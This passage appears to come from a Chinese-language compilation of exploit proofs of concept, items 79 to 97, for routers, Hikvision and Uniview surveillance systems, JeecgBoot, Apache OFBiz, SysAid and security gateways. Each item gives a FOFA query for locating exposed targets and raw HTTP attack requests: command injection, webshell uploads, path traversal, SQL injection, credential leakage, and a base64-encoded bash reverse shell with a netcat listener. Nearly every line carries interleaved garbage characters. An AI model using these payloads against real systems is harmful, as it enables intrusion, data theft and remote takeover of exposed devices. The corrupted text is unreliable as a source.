Accept-Encoding: gzip
. s+ v6 A9 c9 }/ o* RContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l2 M) g- Y8 M% e6 ^
! U! n- c! c  n6 @
------YsOxWxSvj1KyZow1PTsh98fdu6l* c/ P- [( O) A3 ?8 `7 A1 @% M; C
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
) Q1 D5 Y4 h' P! X1 b* \/ `Content-Type: image/png- w, A: y8 Y2 Q! `- j* v; \$ ^8 e
. L6 x1 K" r6 d& C; l: ]2 v
YsOxWxSvj1KyZow1PTsh98fdu6l
5 ~* l! u+ b( u/ S* }------YsOxWxSvj1KyZow1PTsh98fdu6l
  K% ?' F/ }( C  Q3 W0 CContent-Disposition: form-data; name="target", x( N" b& A) h/ b9 H7 Q( c5 r2 M% t
$ N, }/ h6 Y# s5 Z# ^0 i6 K
/Applications/SkillDevelopAndEHS/
4 o  D1 G/ \3 X1 k$ j/ m: L------YsOxWxSvj1KyZow1PTsh98fdu6l--
$ b: [" |3 s7 ^5 d: Q! P
0 b: g, k) P% c& f3 p$ @) H* F/ m' ]' U2 S9 b5 D
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1, ]: M6 X3 t$ f, M# k/ [
Host: x.x.x.x
. M/ H6 }; S) I7 R* A, u- S6 U; S! o; P. V4 I! W; J; M

- l. Z5 l! m& T" C2 w4 d+ ]79. BYTEVALUE 百为流控路由器远程命令执行- |7 L# z; n% A! h" b  B. t
FOFA:BYTEVALUE 智能流控路由器
  G) I2 e; T. Y; SGET /goform/webRead/open/?path=|id HTTP/1.1( |$ r* e5 h& `% u
Host:IP7 `: E- u8 O" d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0  A- r5 y9 J, v& V  |, s. h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! d& u# C9 Z+ g7 g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- z7 E) t9 g9 O8 w5 Z# ]) _6 N0 Q
Accept-Encoding: gzip, deflate
, v, z. R, u5 B5 g6 mConnection: close- m; l' c3 u7 a% t, |! r3 A
Upgrade-Insecure-Requests: 18 x! ~$ y/ H' Y  c3 g3 j- x

) T' ?/ }. l, Q# h- x5 H, A0 s; p( w0 b! }8 u$ d4 d  m2 P
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传4 C, a, w. [" J  C- W
FOFA:app="速达软件-公司产品"
- l  v8 t1 T6 ?% @POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
$ q% C4 G5 x' L7 k5 a' z' p$ K/ o/ HHost: x.x.x.x
& x* ^) }6 s' F. F( _! Q8 T  \: bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 Q" B9 F* H3 H, _, \: WContent-Length: 27
6 e& x) `; y4 {6 ?+ vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 ]0 E* ^7 a' K0 i. J, k! P0 KAccept-Encoding: gzip, deflate
" M  e3 X% B' _, t' k8 u3 w# JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 [) m- W- A, UConnection: close
0 l. V" h; X8 N8 K) ?Content-Type: application/octet-stream
/ W8 |* n2 X, [5 MUpgrade-Insecure-Requests: 1
/ P% {; W7 A- C) S/ _2 Q
( ~% R6 O1 ~* E  B& F7 T+ O3 j( J) {<% out.print("oessqeonylzaf");%>! |1 b; N, _1 w$ _5 O6 p
& I# `% r! |) k6 d- b3 a
1 S$ l3 ~1 J1 s; Q+ t5 @2 i
GET /xykqmfxpoas.jsp HTTP/1.1
7 P+ f3 |  i" m7 kHost: x.x.x.x( U5 h) z2 h& g5 q$ h+ }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
  K& F2 A. X) ]% A- r( KConnection: close+ w0 V( N* x3 T2 ~/ q; N* n0 D
Accept-Encoding: gzip1 c, _) `+ w& x3 a% r1 l( {

$ \$ m; }6 M1 Q9 O6 d
" q3 o  Q# ~# z, f9 K" C81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
2 f: b' m' m% j. w( t0 `- d9 tFOFA:app="uniview-视频监控"5 i" a- {$ z; b
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
( \" B  E* i9 s6 ~# {' XHost: x.x.x.x  ^- z: K! j" a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% f/ b; k4 ^8 @5 _3 E( w/ e! s3 y% }Connection: close  c' m0 R, A  x8 P$ D! q5 S) }! |
Accept-Encoding: gzip
; W: O  d) s7 B- D5 _
0 W6 O! o: v/ d; }% Z! ]8 t( d' ~: E* G' n, B) `; V2 }) C
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行1 }2 q. I5 i) u5 d  p. d$ s# ]
FOFA:app="思福迪-LOGBASE"
6 |" @7 A% N9 ^4 a! X3 APOST /bhost/test_qrcode_b HTTP/1.1$ W8 }/ _' `! U9 O0 X" u
Host: BaseURL0 K. C+ v7 p  S
User-Agent: Go-http-client/1.1
( V/ I2 e- H8 {- IContent-Length: 23  _: f& `3 w' R9 c( @4 o
Accept-Encoding: gzip& A  s# o( p9 Z) U/ [( ^" U8 [
Connection: close
6 B/ X  c: H/ P1 a: m6 x8 V5 vContent-Type: application/x-www-form-urlencoded* ]2 o, [* F/ R' z
Referer: BaseURL+ p: Z5 ?" q7 x4 u& o& B" u
, L+ ?0 t6 C, U% X' X& Q3 \$ K
z1=1&z2="|id;"&z3=bhost& Y7 m, |, T2 E2 N( A

- O  J- x; u3 [) g: @& H( y# s6 [
83. JeecgBoot testConnection 远程命令执行
* a6 ]* v' {* Y, C, PFOFA:title=="JeecgBoot 企业级低代码平台"
! k2 d% ]3 d  c0 V& ?: Y. T8 Z9 ]6 y7 q7 s* e  [5 q
) y' @: W5 ~) `7 g6 U/ o
POST /jmreport/testConnection HTTP/1.1
& ^1 [$ E1 s- J( e" Q+ bHost: x.x.x.x) E+ G: L/ _' K1 _- k8 ^3 r( M& A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& @/ }1 G- z7 Y3 Z( o
Connection: close# T+ r$ z, a2 e+ w6 \
Content-Length: 88817 j# T* S( D  k7 V# e
Accept-Encoding: gzip
! M  W" f8 L; G3 l0 f# JCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"9 T8 F& o( o( p! J; Y
Content-Type: application/json
$ v: M7 ~1 d$ S/ B, m, y- q! ^5 i! q6 D% z  b' A
PAYLOAD5 g9 E6 }* J* l0 o" y2 h: s8 _

2 j  ~0 j. |: c6 o  _) s84. Jeecg-Boot JimuReport queryFieldBySql 模板注入0 Z+ m' c$ Q/ U2 X: D5 a
FOFA:title=="JeecgBoot 企业级低代码平台"9 X% I* [5 R; _$ S/ p: S! F" e6 d

) b) i( r2 O( t) O. u: F4 ?4 n7 e# d) ~+ c3 O% S
+ \. r: `6 ~; b& Y% g3 h! i
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1, J' X: `: p5 Z& N. X& s
Host: 192.168.40.130:8080
4 e% |/ T  _0 [) o5 z  U8 w' P; ~User-Agent: curl/7.88.17 \4 \2 m4 a, F6 V# X  L. I4 ?6 X
Content-Length: 1566 M0 u$ f& m* q- O( [: V5 f. N3 ]
Accept: */*: |! {& m; X# |
Connection: close
) O( l9 x8 h9 F  S: I4 xContent-Type: application/json
, o2 t, i) Y6 oAccept-Encoding: gzip
( p9 }- j- B5 d1 t9 u% s7 V2 P# Q: `. H: `  U  ]; Q8 X' y. M
{" n0 R- U( X# P/ G5 x; ~
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
/ Q' Q/ Z, ~" E: T* |$ a  "type": "0"
! D1 ~6 W; j0 s1 O! j% V& h: a}* L0 @) g2 h& {7 t% H' r0 Y$ E# S

6 s( [; ]! X0 p: {/ }  ]9 @6 T; ?% y6 Z+ F% f9 z8 s9 d! X5 Z
85. SysAid On-premise< 23.3.36远程代码执行
* }& [$ T8 j' @* e. Y$ z. K& ~CVE-2023-47246& U* S$ @( l' ~$ |. S+ ^2 e
FOFA:body="sysaid-logo-dark-green.png"
# M: u) b# c% fEXP数据包如下,注入哥斯拉马7 X3 `* z! q% |: \: ?) }- \
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1) s1 L( P" \0 c0 P7 y7 o
Host: x.x.x.x
0 G  k. i" ~! n2 m( b+ fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 W6 ~  X/ N) Y7 j
Content-Type: application/octet-stream( Q9 Z. w7 q5 G3 g$ d8 T  E8 ], b
Accept-Encoding: gzip
- ^  g' L" W% H4 |; I
+ j. H/ f$ K  n3 w" U  d' k; [( iPAYLOAD' A' q. n4 Y- ~5 z5 ^

' H  K! L0 v2 N7 G1 t( m1 @回显URL:http://x.x.x.x/userfiles/index.jsp
5 n' Z. p5 I- B2 t  a5 S; ]# w$ S) z7 j
86. 日本tosei自助洗衣机RCE
2 _0 T  g/ {# W6 FFOFA:body="tosei_login_check.php"
& T/ {0 C( P0 v% _1 [$ _+ lPOST /cgi-bin/network_test.php HTTP/1.1$ |  k! S6 }% A( ?9 h$ b" N
Host: x.x.x.x9 K% a! I9 z2 N& q5 }7 u
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.366 c/ e' W# P. c2 v% k) h$ f
Connection: close" h9 F8 L6 b' Q' \( p
Content-Length: 44
! y( @9 }" F1 yAccept: */*
! G8 O& k% n4 L7 J) hAccept-Encoding: gzip' L4 n9 M0 R# T3 U8 Z, o
Accept-Language: en# y" I0 a. [8 q- \8 ^- ~
Content-Type: application/x-www-form-urlencoded
" }; n1 C7 w7 F0 u1 p& i. {, ~2 J! P! {; S4 C* v* X
host=%0acat${IFS}/etc/passwd%0a&command=ping+ I" x5 H/ [* t* y  M

2 \+ B8 S- Q5 }/ \4 k! A. N+ t
- q  e  F: [# i7 G7 b# g9 L1 F6 g87. 安恒明御安全网关aaa_local_web_preview文件上传( i' C/ H$ r. _, y6 @
FOFA:title="明御安全网关"' t5 ^* ~" m5 C2 B5 D/ x, u; b8 |
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1; q$ ]1 D* ^/ |7 y$ h
Host: X.X.X.X1 V9 s- `7 @7 L) P+ D4 |& I8 Z, Q  W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" J# |! A7 y; jConnection: close
$ D7 n6 D3 y, }- OContent-Length: 198$ J7 k! s/ g0 X' i' g- V) c
Accept-Encoding: gzip+ Q8 o' ^( t% n  N% U5 S
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd" g& g" M2 U, C
, v  ?; r  d' k# O& A) ~/ Z3 X
--qqobiandqgawlxodfiisporjwravxtvd
. [. p( p2 Q& m0 N; O0 \& QContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
/ x5 [6 u0 L9 {! i3 `' ~/ eContent-Type: text/plain
/ a4 p, p4 o: P5 o
( t. q. M! q2 O( A- e9 n& h2ZqGNnsjzzU2GBBPyd8AIA7QlDq% O3 _& @  f- ^& [2 O, K9 d* a* F
--qqobiandqgawlxodfiisporjwravxtvd--9 y  t4 `* q! H/ C- r
6 G& a- ?# C& r9 M: w5 U. H
/ g5 W5 ^& P7 I- }$ Q1 Z8 A
/jfhatuwe.php
! A3 o# S! K! ^# Y( e+ L+ E
6 m6 E# Z: g. O88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
1 _2 D) \- Y2 Y0 v! xFOFA:title="明御安全网关"
6 K9 ~: U( W6 P. K* z) e. ~0 ^* bGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
! N# p9 }6 f) M$ a; x6 ?Host: x.x.x.xx.x.x.x
1 A# h  ~$ \5 W9 S( IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 e. O) ?2 d' U: e+ T. b/ f  r# Y! YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 D2 R: H4 a: T! G! r. fAccept-Encoding: gzip, deflate& |" ~- z. H7 F$ R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% X9 s  b/ a& Z! A. M8 F7 Y
Connection: close
% `' }, E' [8 ]- r9 t) m0 L& t1 I
5 _& O6 R. L& I5 p' B# W; E$ ^0 m  i6 M- ~
/astdfkhl.php' e& H, h, i& n
& X4 o! r. P- U+ U
89. 致远互联FE协作办公平台editflow_manager存在sql注入, |5 o% X9 A) d( Q$ `" _
FOFA:title="FE协作办公平台" || body="li_plugins_download"
4 [: W/ m+ j& P6 P4 Q1 k( I/ n1 FPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
" k' s' g0 Q3 V: VHost: x.x.x.x0 G0 C' S7 p2 h* p. u) e- w$ t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% C  e- v8 P3 X; g
Connection: close9 N) R- E/ v8 J
Content-Length: 41
( a8 K9 d0 v4 i4 l$ sContent-Type: application/x-www-form-urlencoded. k' g# r/ O1 z4 R
Accept-Encoding: gzip2 `5 o, r* D! C# G6 X% b4 r! U
7 i" C: o7 @7 I# S+ F! ^9 R- ^
option=2&GUID=-1'+union+select+111*222--+8 I$ d6 V- l& ]6 J

8 o& N# ^/ h% W  T
% g+ f! R5 [0 ~5 I/ e2 G' h) i90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
: B/ `9 g* f! qFOFA:icon_hash="-1830859634"
1 o# R2 {* Q! e, {( IPOST /php/ping.php HTTP/1.16 g9 G4 t3 q8 [; P* p
Host: x.x.x.x
* d, x( z+ r4 z$ nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0/ v$ O6 J) u$ [' r6 n: L) M0 i# ]6 D
Content-Length: 51# G& E0 s+ {$ ]* j, d0 I
Accept: application/json, text/javascript, */*; q=0.01
* _& l! t, r# I- K4 a8 o6 q$ IAccept-Encoding: gzip, deflate- A2 H! r- g, N" m1 T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: s0 @4 h) x; r( Z# yConnection: close/ E+ Q5 }3 `6 X9 ?5 f
Content-Type: application/x-www-form-urlencoded
; \, h. H) N6 zX-Requested-With: XMLHttpRequest
5 u7 _4 w4 G" p0 J. O( H6 ?( x  t4 Y
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig' @( D4 V8 y$ d( z/ e( ]5 {/ Y
. {% A6 {! j; d% a3 K* D

; n% N# A3 F6 x" A8 X0 F" [91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取+ ^5 t  p& a3 \6 D( ^3 R8 I7 B
FOFA:title="综合安防管理平台"0 n! c. V; D7 G/ {7 y
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
: }& h1 K, _. `* f  YHost: your-ip% X0 V6 a$ z4 p4 l- t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
3 o8 D& ?* J5 u$ T0 q, _Accept-Encoding: gzip, deflate
3 u" q: v( N" k4 m3 h/ {Accept: */*. \% e! K% G- E, G
Connection: keep-alive: `2 @1 m* s( L1 H( B3 Q. n
7 g( T" _# \, e: s- Y
. ?6 [: ]' \2 D- Y7 e0 W0 N

% j, G8 d& r" j4 W( J9 ?. k: I# r92. 海康威视运行管理中心session命令执行7 `1 m  ^# Z( C' L$ K1 X/ r5 C, I
Fastjson命令执行: y) i( W4 V# S0 I# _# a
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
9 n/ p% |  `- m2 |. a/ M  {4 UPOST /center/api/session HTTP/1.1- f- L) K- q6 t
Host:0 B( f/ ]# d3 A  |
Accept: application/json, text/plain, */*0 B2 G" [, ^9 W  n5 ?6 m; E
Accept-Encoding: gzip, deflate
" l" V  D. {2 u: y' J: ?X-Requested-With: XMLHttpRequest
- Z/ d3 r4 i9 q4 AContent-Type: application/json;charset=UTF-8
5 r9 R: T0 e; V- `X-Language-Type: zh_CN- }0 x7 L2 o0 t) R
Testcmd: echo test8 e5 z$ ^- b7 f- V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36- g% m1 R1 ~2 B4 E# C
Accept-Language: zh-CN,zh;q=0.9
) q2 H# P* J2 l/ {. h( F9 X/ hContent-Length: 57786 Y' q+ W3 j+ ]' m; y# V

( ~% \5 R  V- u1 [& J4 m0 {' {5 F' C: WPAYLOAD" t! L3 B5 x) c' E0 W" q9 y

; B4 J: u2 j0 G6 g. O) S
0 A$ }3 Z5 e; M93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传# v$ R( n7 D, z' n7 T# x6 ~
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="& v4 g2 ]/ y! `( t  `* k/ ?
POST /?g=app_av_import_save HTTP/1.1$ b4 B5 n4 x( r
Host: x.x.x.x
3 G1 h; a/ B9 n5 TContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx' t- N* l2 f7 w9 F8 K1 v5 u8 E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.367 C& l9 U( B: i1 n# l- t
* z0 y+ P' K* Q) W$ _
------WebKitFormBoundarykcbkgdfx' W0 s# U/ K0 Y
Content-Disposition: form-data; name="MAX_FILE_SIZE"% T  D1 _9 W! L! h$ D7 ?- N
, @* x3 H9 F# M; \! A( E
10000000
2 z( Z2 i! a9 e) d% P" W------WebKitFormBoundarykcbkgdfx
! ~+ I* d6 [+ u' E) K. T$ \Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"" X. s" i, ~' ?. p. B
Content-Type: text/plain7 E4 o' k$ T4 P, V+ T! P

" s) V9 r( ~! L0 c  W; c* A2 r: J& ~( \wagletqrkwrddkthtulxsqrphulnknxa, ~0 _" q3 q0 W. m2 ^/ M0 z
------WebKitFormBoundarykcbkgdfx# \! D: l+ p+ P3 Y7 A. V. C6 H
Content-Disposition: form-data; name="submit_post"
7 {" u7 G; m* x6 z; w
8 [# H7 O5 _% @/ h6 f# dobj_app_upfile: g3 G9 [- I9 l1 `' |
------WebKitFormBoundarykcbkgdfx' |' Y- G" x9 v  X, \" d# E- @. o3 ^
Content-Disposition: form-data; name="__hash__"
* y7 L; F' l0 d5 M0 I9 H! E; L% d  M) i7 s# E# o  {! X$ H$ ^
0b9d6b1ab7479ab69d9f71b05e0e9445+ B" O3 I! d7 A) u1 D5 w
------WebKitFormBoundarykcbkgdfx--
) S  {) c  N7 D% v+ e
! P# z. Q4 L$ S. B- o/ O( H) K5 ^* l- T9 y5 \. p+ A+ L3 t
GET /attachements/xlskxknxa.txt HTTP/1.1
% \/ N; t- m* P$ @9 O+ {' q9 qHost: xx.xx.xx.xx
7 J% u) a& k- ?: W- n" D: T) h% v% \User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; B" ^. R( h$ t/ t
; G; R  N  F$ Z, R# ?0 D. j; V( A% s- U8 }/ z8 _
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
2 t: d% ]' d! A0 B* S4 }FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
# K: e* u+ L2 I# j5 [- }1 x# gPOST /?g=obj_area_import_save HTTP/1.1
9 Q0 {2 S6 u0 C; {) B* eHost: x.x.x.x* F1 v1 }: j/ j/ K; N# o
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt: m. i. E  _" u. t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36; I; |% I) O; Z5 z) ], L" {
! D/ B5 H' E3 W) I0 k7 m9 h
------WebKitFormBoundarybqvzqvmt
' u# m( \3 |2 A3 VContent-Disposition: form-data; name="MAX_FILE_SIZE"+ n: {: O/ |* k+ h9 s/ c" P
& @+ w) k  Y, l3 R' p5 E
10000000
0 \; D) |* D5 o0 k8 W------WebKitFormBoundarybqvzqvmt3 }% A! H3 h4 w, X* v9 S; ^
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
& o3 w3 i! _) U* w; }6 `) v6 YContent-Type: text/plain9 n, Q" d$ W+ G+ Q( X
8 S) x% G1 i+ l- y0 z
pxplitttsrjnyoafavcajwkvhxindhmu8 ]4 [* U! l- @7 p  {
------WebKitFormBoundarybqvzqvmt
! w3 _4 H7 ^: j1 J5 pContent-Disposition: form-data; name="submit_post"
. ?/ Z4 K5 E! R
, Q$ n- C1 m0 z7 j: robj_app_upfile
0 ~5 l$ F2 [: Q& B1 ?0 i$ f& @. ]& ?------WebKitFormBoundarybqvzqvmt
" @8 n# [# E, x$ p' S( ?7 E" t  aContent-Disposition: form-data; name="__hash__"
! p3 ?# ^, E" q' O# J$ |7 I1 f1 e+ s5 L& [# ~! S: l
0b9d6b1ab7479ab69d9f71b05e0e9445
0 I3 Q6 s5 g- g------WebKitFormBoundarybqvzqvmt--; v. t5 u9 q' Q% c- s  ~
; M4 c  r: `2 a7 B2 m
7 I4 X; Y: F9 _* l9 p6 n

; G& R0 p6 u; j* G: j6 ]& `GET /attachements/xlskxknxa.txt HTTP/1.1) Z' q$ I+ E. T8 H3 y1 `
Host: xx.xx.xx.xx
! V  _7 h% ~7 W7 CUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36/ ^" l8 [3 j, X  s

% \$ X$ j, m0 P9 z8 t
' [+ f: S' S* b, h6 h/ L" \5 r7 g  s6 q, i. J, S) O# s  @
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
* Z) g, T2 P- L- W5 KCVE-2023-49070
" o0 C8 X2 B" q4 J0 A+ @4 E7 QFOFA:app="Apache_OFBiz"
) b' h6 c' |% F( b& LPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1& `' T3 }# P4 B8 O
Host: x.x.x.x
# P- W0 l2 |" O6 k7 F6 gUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36/ M8 c. d2 i- }# X% G; [- S
Connection: close! \# H/ f6 x- `% H
Content-Length: 889
' [1 ?- e0 b$ Y; o5 RContent-Type: application/xml" i7 K: H% x0 M8 R2 e% J
Accept-Encoding: gzip5 a0 ^7 v( g2 C  V: b3 q

) U- b! {9 r, k# y8 }& o0 [<?xml version="1.0"?>4 z) K  v$ f( y  ]# c
<methodCall>
8 e! S1 ^* m3 H: j" X0 A   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>) ]' M& Y% g, z& ^* u8 P" Y" i
    <params>3 f; |4 n; \5 q- J, U* }. L$ R/ S
      <param>! F1 f) D3 R. i. g/ p% u" {- |
      <value>5 H. x" P! K, [+ }
        <struct>% V- @4 n; @! F" [$ @0 Z6 Z
       <member>4 ?- e9 M1 q2 q
          <name>test</name>6 R( Z, z6 {: \
          <value>
( f6 l( [- s3 `( x1 K# M      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>- |2 S) @% o9 u5 T# s5 Y
          </value>& @/ y* ~. \" r7 g' N/ c
        </member>
  T9 j: z$ P  k" f) e  R+ Q      </struct>, S+ q) N1 X; F4 ]
      </value>
" K8 ]. E! w/ O" r1 q    </param>
: s0 F6 p6 z. c4 G" r0 z    </params>& f7 a$ S; y3 X4 s# j5 [
</methodCall>
+ d( {! v3 ?0 M7 `$ @- m0 K: R! F  F: I

6 m% \' ~$ u( E& o  H  v# ^用ysoserial生成payload/ l' a5 a% \8 b1 Y+ a1 o
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"9 `# t% }- D5 L5 @

! J' h1 ^7 O: k& E* n) L
2 _/ I8 i( j  D1 `) [将生成的payload替换到上面的POC% N- p/ D2 ?6 ]5 \( q/ b1 Y
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.10 p3 z; c; {! B1 k9 o
Host: 192.168.40.130:8443
4 s0 r  C# I1 L1 {" m( lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
% f' N" b. q% P% `+ c# YConnection: close* D0 r, G/ O% O2 v3 g
Content-Length: 889
$ d5 E2 C2 X5 v+ l% L  ZContent-Type: application/xml% k9 v( g  f1 @6 I
Accept-Encoding: gzip
# S* F/ b: \. C' p  s- o& d1 a0 K# x( v5 \8 h
PAYLOAD) j5 B# n+ G: @. E2 j4 D) H2 q: y
" v) R$ w9 N1 z* T
96. Apache OFBiz  18.12.11 groovy 远程代码执行7 P  [  I( X% ?) E/ ?4 c, t7 z
FOFA:app="Apache_OFBiz"' X8 Z3 W' G6 l/ O+ M
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1  v/ g8 C* C; t& [
Host: localhost:8443
3 _! A' F8 T; G5 P$ WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.05 g. b1 ]7 k( s
Accept: */*
! v  u; }* ^, h5 K; R; TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 O# G* s) ~: A* A6 B( v
Content-Type: application/x-www-form-urlencoded5 F9 R+ h% g: K# n
Content-Length: 55
9 [! Z/ G; M0 b! w
- Q3 k6 a( o% r* }& YgroovyProgram=throw+new+Exception('id'.execute().text);
) J3 k; l$ m  ^* c# |
/ s+ [7 ]9 o" R
% {* U, H* E' u1 C反弹shell1 i8 N: K" g6 R% `5 ^$ N, j
在kali上启动一个监听
4 k- S, E2 l5 J# G: R9 unc -lvp 77774 F: S+ J  e, }
7 O$ O) R6 X0 ]- \( d
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
) I$ J$ d- q! l& OHost: 192.168.40.130:8443- D6 \2 S" t4 ?8 b: x5 z' J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; H2 _' W3 s# M8 C. T( Z
Accept: */*6 ^; @; Q+ z# |% o7 c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  y& `* u8 X) H' K
Content-Type: application/x-www-form-urlencoded; P7 k3 H6 ~, \8 X- ^
Content-Length: 71
) Y' ~% t7 d7 B8 J
6 N' J. `4 z* R8 \( N; L5 D. ~groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
8 A+ a/ S3 y" y& r9 d; W
3 e" T: p; N8 s+ z2 T97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
1 h2 J# q8 u( ^) hFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"$ m0 A! D- Y5 y" g$ O: W8 e6 @/ J- y
GET /passport/login/ HTTP/1.1
, l# z6 K# _. B) p) P: K6 qHost: 192.168.40.130:8085
